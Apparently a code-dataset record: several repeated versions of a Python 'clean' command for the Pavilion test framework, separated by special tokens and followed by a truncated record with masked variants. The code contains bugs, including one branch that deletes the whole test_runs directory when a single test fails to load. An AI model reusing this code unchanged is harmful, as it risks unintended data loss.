output.fprint('Removing Tests...', file=self.outfile, color=output.
GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /
test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint('Removing bad test directory {}'.format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
if (test_time < cutoff_date and status != STATES.RUNNING and
status != STATES.SCHEDULED):
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint('Removed test {}'.format(test), file=self
.outfile)
else:
if args.verbose:
output.fprint('Skipped test {}'.format(test), file=self
.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
completed_series = True
output.fprint('Removing Series...', file=self.outfile, color=output
.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(os.path.getmtime((
series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint('Removed series {}'.format(series),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped series {}'.format(series), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Downloads...', file=self.outfile, color=
output.GREEN)
for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(os.path.getmtime((
download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint('{} is not a directory.'.format(
download), file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint('Removed download {}'.format(download
), file=self.outfile)
elif args.verbose:
output.fprint('Skipped download {}'.format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Builds...', file=self.outfile, color=output
.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(os.path.getmtime((
build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint('Removed build {}'.format(build),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped build {}'.format(build), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed. '.
format(err[1]), file=self.errfile, color=31)
return 0
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CleanCommand(commands.Command):
"""Cleans outdated test and series run directories."""
def __init__(self):
super().__init__('clean', 'Clean up Pavilion working directory.',
short_help='Clean up Pavilion working diretory.')
def _setup_arguments(self, parser):
parser.add_argument('-v', '--verbose', action='store_true', default
=False, help='Verbose output.')
parser.add_argument('--older-than', nargs='+', action='store', help
=
'Set the max age of files to be removed. Can be a date ex:"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(days=int(args.
older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(weeks=int(args.
older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint('{} is not a valid date.'.format(args.
older_than), file=self.errfile, color=output.RED)
return errno.EINVAL
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
output.fprint('Removing Tests...', file=self.outfile, color=output.
GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /
test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint('Removing bad test directory {}'.format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
if (test_time < cutoff_date and status != STATES.RUNNING and
status != STATES.SCHEDULED):
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint('Removed test {}'.format(test), file=self
.outfile)
else:
if args.verbose:
output.fprint('Skipped test {}'.format(test), file=self
.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
completed_series = True
output.fprint('Removing Series...', file=self.outfile, color=output
.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(os.path.getmtime((
series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint('Removed series {}'.format(series),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped series {}'.format(series), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Downloads...', file=self.outfile, color=
output.GREEN)
for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(os.path.getmtime((
download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint('{} is not a directory.'.format(
download), file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint('Removed download {}'.format(download
), file=self.outfile)
elif args.verbose:
output.fprint('Skipped download {}'.format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Builds...', file=self.outfile, color=output
.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(os.path.getmtime((
build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint('Removed build {}'.format(build),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped build {}'.format(build), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed. '.
format(err[1]), file=self.errfile, color=31)
return 0
def get_month_delta(months):
"""Turn a number of months in the future into a concrete date."""
today = datetime.today()
cur_year = today.year
cur_day = today.day
cur_month = today.month
cur_time = today.time
if cur_month - months <= 0:
cut_month = (cur_month - months) % 12
diff_years = (cur_month - months) // 12
cut_year = cur_year + diff_years
else:
cut_month = cur_month - months
cut_year = cur_year
try:
cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)
except ValueError:
last_day = monthrange(cut_year, cut_month)[1]
cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)
return cutoff_date
<|reserved_special_token_1|>
import errno
import os
import shutil
from calendar import monthrange
from datetime import datetime, timedelta
from pavilion import output
from pavilion import commands
from pavilion.status_file import STATES
from pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError
class CleanCommand(commands.Command):
"""Cleans outdated test and series run directories."""
def __init__(self):
super().__init__('clean', 'Clean up Pavilion working directory.',
short_help='Clean up Pavilion working diretory.')
def _setup_arguments(self, parser):
parser.add_argument('-v', '--verbose', action='store_true', default
=False, help='Verbose output.')
parser.add_argument('--older-than', nargs='+', action='store', help
=
'Set the max age of files to be removed. Can be a date ex:"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(days=int(args.
older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(weeks=int(args.
older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint('{} is not a valid date.'.format(args.
older_than), file=self.errfile, color=output.RED)
return errno.EINVAL
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
output.fprint('Removing Tests...', file=self.outfile, color=output.
GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /
test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint('Removing bad test directory {}'.format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
if (test_time < cutoff_date and status != STATES.RUNNING and
status != STATES.SCHEDULED):
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint('Removed test {}'.format(test), file=self
.outfile)
else:
if args.verbose:
output.fprint('Skipped test {}'.format(test), file=self
.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
completed_series = True
output.fprint('Removing Series...', file=self.outfile, color=output
.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(os.path.getmtime((
series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint('Removed series {}'.format(series),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped series {}'.format(series), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Downloads...', file=self.outfile, color=
output.GREEN)
for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(os.path.getmtime((
download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint('{} is not a directory.'.format(
download), file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint('Removed download {}'.format(download
), file=self.outfile)
elif args.verbose:
output.fprint('Skipped download {}'.format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed'.
format(err[1]), file=self.errfile, color=31)
output.fprint('Removing Builds...', file=self.outfile, color=output
.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(os.path.getmtime((
build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint('Removed build {}'.format(build),
file=self.outfile)
elif args.verbose:
output.fprint('Skipped build {}'.format(build), file=
self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint('Permission Error: {} cannot be removed. '.
format(err[1]), file=self.errfile, color=31)
return 0
def get_month_delta(months):
"""Turn a number of months in the future into a concrete date."""
today = datetime.today()
cur_year = today.year
cur_day = today.day
cur_month = today.month
cur_time = today.time
if cur_month - months <= 0:
cut_month = (cur_month - months) % 12
diff_years = (cur_month - months) // 12
cut_year = cur_year + diff_years
else:
cut_month = cur_month - months
cut_year = cur_year
try:
cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)
except ValueError:
last_day = monthrange(cut_year, cut_month)[1]
cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)
return cutoff_date
<|reserved_special_token_1|>
import errno
import os
import shutil
from calendar import monthrange
from datetime import datetime, timedelta
from pavilion import output
from pavilion import commands
from pavilion.status_file import STATES
from pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError
class CleanCommand(commands.Command):
"""Cleans outdated test and series run directories."""
def __init__(self):
super().__init__(
'clean',
'Clean up Pavilion working directory.',
short_help="Clean up Pavilion working diretory."
)
def _setup_arguments(self, parser):
parser.add_argument(
'-v', '--verbose', action='store_true', default=False,
help='Verbose output.'
)
parser.add_argument(
'--older-than', nargs='+', action='store',
help='Set the max age of files to be removed. Can be a date ex:'
'"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(
days=int(args.older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(
weeks=int(args.older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint("{} is not a valid date."
.format(args.older_than),
file=self.errfile, color=output.RED)
return errno.EINVAL
# No cutoff specified, removes everything.
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
# Clean Tests
output.fprint("Removing Tests...", file=self.outfile,
color=output.GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(
os.path.getmtime((tests_dir / test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint("Removing bad test directory {}".format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint("Permission Error: {} cannot be removed"
.format(err[1]), file=self.errfile, color=31)
if test_time < cutoff_date and status != STATES.RUNNING \
and status != STATES.SCHEDULED:
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint("Removed test {}".format(test),
file=self.outfile)
else:
if args.verbose:
output.fprint("Skipped test {}".format(test),
file=self.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
# Clean Series
completed_series = True
output.fprint("Removing Series...", file=self.outfile,
color=output.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(
os.path.getmtime((series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint("Removed series {}".format(series),
file=self.outfile)
else:
if args.verbose:
output.fprint("Skipped series {}".format(series),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint("Permission Error: {} cannot be removed"
.format(err[1]), file=self.errfile, color=31)
# Clean Downloads
output.fprint("Removing Downloads...", file=self.outfile,
color=output.GREEN)
for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(
os.path.getmtime((download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint("{} is not a directory.".format(download),
file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint("Removed download {}".format(download),
file=self.outfile)
else:
if args.verbose:
output.fprint("Skipped download {}".format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint("Permission Error: {} cannot be removed"
.format(err[1]), file=self.errfile, color=31)
# Clean Builds
output.fprint("Removing Builds...", file=self.outfile,
color=output.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(
os.path.getmtime((build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint("Removed build {}".format(build),
file=self.outfile)
else:
if args.verbose:
output.fprint("Skipped build {}".format(build),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint("Permission Error: {} cannot be removed. "
.format(err[1]), file=self.errfile, color=31)
return 0
def get_month_delta(months):
"""Turn a number of months in the future into a concrete date."""
today = datetime.today()
cur_year = today.year
cur_day = today.day
cur_month = today.month
cur_time = today.time
if cur_month - months <= 0:
cut_month = (cur_month - months) % 12
diff_years = (cur_month - months) // 12
cut_year = cur_year + diff_years
else:
cut_month = cur_month - months
cut_year = cur_year
try:
cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)
except ValueError:
last_day = monthrange(cut_year, cut_month)[1]
cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)
return cutoff_date
|
flexible
|
{
"blob_id": "18aafb71d7e6f5caa2f282126c31eb052c08ad3c",
"index": 4307,
"step-1": "<mask token>\n\n\nclass CleanCommand(commands.Command):\n <mask token>\n\n def __init__(self):\n super().__init__('clean', 'Clean up Pavilion working directory.',\n short_help='Clean up Pavilion working diretory.')\n\n def _setup_arguments(self, parser):\n parser.add_argument('-v', '--verbose', action='store_true', default\n =False, help='Verbose output.')\n parser.add_argument('--older-than', nargs='+', action='store', help\n =\n 'Set the max age of files to be removed. Can be a date ex:\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(days=int(args.\n older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(weeks=int(args.\n older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint('{} is not a valid date.'.format(args.\n older_than), file=self.errfile, color=output.RED)\n return errno.EINVAL\n else:\n cutoff_date = datetime.today()\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n dependent_builds = []\n incomplete_tests = []\n output.fprint('Removing Tests...', file=self.outfile, color=output.\n GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /\n test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, TestRunNotFoundError):\n output.fprint('Removing bad test directory {}'.format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n if (test_time < cutoff_date and status != STATES.RUNNING and \n status != STATES.SCHEDULED):\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint('Removed test {}'.format(test), file=self\n .outfile)\n else:\n if args.verbose:\n output.fprint('Skipped test {}'.format(test), file=self\n .outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n completed_series = True\n output.fprint('Removing Series...', file=self.outfile, color=output\n .GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(os.path.getmtime((\n series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint('Removed series {}'.format(series),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped series {}'.format(series), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Downloads...', file=self.outfile, color=\n output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(os.path.getmtime((\n download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint('{} is not a directory.'.format(\n download), file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint('Removed download {}'.format(download\n ), file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped download {}'.format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Builds...', file=self.outfile, color=output\n .GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(os.path.getmtime((\n build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint('Removed build {}'.format(build),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped build {}'.format(build), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed. '.\n format(err[1]), file=self.errfile, color=31)\n return 0\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CleanCommand(commands.Command):\n \"\"\"Cleans outdated test and series run directories.\"\"\"\n\n def __init__(self):\n super().__init__('clean', 'Clean up Pavilion working directory.',\n short_help='Clean up Pavilion working diretory.')\n\n def _setup_arguments(self, parser):\n parser.add_argument('-v', '--verbose', action='store_true', default\n =False, help='Verbose output.')\n parser.add_argument('--older-than', nargs='+', action='store', help\n =\n 'Set the max age of files to be removed. Can be a date ex:\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(days=int(args.\n older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(weeks=int(args.\n older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint('{} is not a valid date.'.format(args.\n older_than), file=self.errfile, color=output.RED)\n return errno.EINVAL\n else:\n cutoff_date = datetime.today()\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n dependent_builds = []\n incomplete_tests = []\n output.fprint('Removing Tests...', file=self.outfile, color=output.\n GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /\n test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, TestRunNotFoundError):\n output.fprint('Removing bad test directory {}'.format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n if (test_time < cutoff_date and status != STATES.RUNNING and \n status != STATES.SCHEDULED):\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint('Removed test {}'.format(test), file=self\n .outfile)\n else:\n if args.verbose:\n output.fprint('Skipped test {}'.format(test), file=self\n .outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n completed_series = True\n output.fprint('Removing Series...', file=self.outfile, color=output\n .GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(os.path.getmtime((\n series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint('Removed series {}'.format(series),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped series {}'.format(series), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Downloads...', file=self.outfile, color=\n output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(os.path.getmtime((\n download_dir / download).as_posix()))\n if download_time < cutoff_date:\n try:\n shutil.rmtree((download_dir / download).as_posix())\n except NotADirectoryError:\n output.fprint('{} is not a directory.'.format(\n download), file=self.errfile, color=output.RED)\n os.remove((download_dir / download).as_posix())\n if args.verbose:\n output.fprint('Removed download {}'.format(download\n ), file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped download {}'.format(download),\n file=self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Builds...', file=self.outfile, color=output\n .GREEN)\n for build in os.listdir(build_dir.as_posix()):\n try:\n build_time = datetime.fromtimestamp(os.path.getmtime((\n build_dir / build).as_posix()))\n if build_time < cutoff_date and build not in dependent_builds:\n shutil.rmtree((build_dir / build).as_posix())\n if args.verbose:\n output.fprint('Removed build {}'.format(build),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped build {}'.format(build), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed. '.\n format(err[1]), file=self.errfile, color=31)\n return 0\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CleanCommand(commands.Command):\n \"\"\"Cleans outdated test and series run directories.\"\"\"\n\n def __init__(self):\n super().__init__('clean', 'Clean up Pavilion working directory.',\n short_help='Clean up Pavilion working diretory.')\n\n def _setup_arguments(self, parser):\n parser.add_argument('-v', '--verbose', action='store_true', default\n =False, help='Verbose output.')\n parser.add_argument('--older-than', nargs='+', action='store', help\n =\n 'Set the max age of files to be removed. Can be a date ex:\"Jan 1 2019\" or , or a number of days/weeks ex:\"32 weeks\"'\n )\n\n def run(self, pav_cfg, args):\n \"\"\"Run this command.\"\"\"\n if args.older_than:\n if 'day' in args.older_than or 'days' in args.older_than:\n cutoff_date = datetime.today() - timedelta(days=int(args.\n older_than[0]))\n elif 'week' in args.older_than or 'weeks' in args.older_than:\n cutoff_date = datetime.today() - timedelta(weeks=int(args.\n older_than[0]))\n elif 'month' in args.older_than or 'months' in args.older_than:\n cutoff_date = get_month_delta(int(args.older_than[0]))\n else:\n date = ' '.join(args.older_than)\n try:\n cutoff_date = datetime.strptime(date, '%b %d %Y')\n except (TypeError, ValueError):\n output.fprint('{} is not a valid date.'.format(args.\n older_than), file=self.errfile, color=output.RED)\n return errno.EINVAL\n else:\n cutoff_date = datetime.today()\n tests_dir = pav_cfg.working_dir / 'test_runs'\n series_dir = pav_cfg.working_dir / 'series'\n download_dir = pav_cfg.working_dir / 'downloads'\n build_dir = pav_cfg.working_dir / 'builds'\n dependent_builds = []\n incomplete_tests = []\n output.fprint('Removing Tests...', file=self.outfile, color=output.\n GREEN)\n for test in os.listdir(tests_dir.as_posix()):\n test_time = datetime.fromtimestamp(os.path.getmtime((tests_dir /\n test).as_posix()))\n try:\n test_obj = TestRun.load(pav_cfg, int(test))\n status = test_obj.status.current().state\n except (TestRunError, TestRunNotFoundError):\n output.fprint('Removing bad test directory {}'.format(test),\n file=self.outfile)\n shutil.rmtree(tests_dir.as_posix())\n continue\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n if (test_time < cutoff_date and status != STATES.RUNNING and \n status != STATES.SCHEDULED):\n shutil.rmtree((tests_dir / test).as_posix())\n if args.verbose:\n output.fprint('Removed test {}'.format(test), file=self\n .outfile)\n else:\n if args.verbose:\n output.fprint('Skipped test {}'.format(test), file=self\n .outfile)\n incomplete_tests.append(test)\n dependent_builds.append(test_obj.build_name)\n completed_series = True\n output.fprint('Removing Series...', file=self.outfile, color=output\n .GREEN)\n for series in os.listdir(series_dir.as_posix()):\n try:\n series_time = datetime.fromtimestamp(os.path.getmtime((\n series_dir / series).as_posix()))\n for test in incomplete_tests:\n if os.path.exists((series_dir / series / test).as_posix()):\n completed_series = False\n if series_time < cutoff_date and completed_series:\n shutil.rmtree((series_dir / series).as_posix())\n if args.verbose:\n output.fprint('Removed series {}'.format(series),\n file=self.outfile)\n elif args.verbose:\n output.fprint('Skipped series {}'.format(series), file=\n self.outfile)\n except PermissionError as err:\n err = str(err).split(\"'\")\n output.fprint('Permission Error: {} cannot be removed'.\n format(err[1]), file=self.errfile, color=31)\n output.fprint('Removing Downloads...', file=self.outfile, color=\n output.GREEN)\n for download in os.listdir(download_dir.as_posix()):\n try:\n download_time = datetime.fromtimestamp(os.path.getmtime((\n download_dir / download).as_posix()))\n if 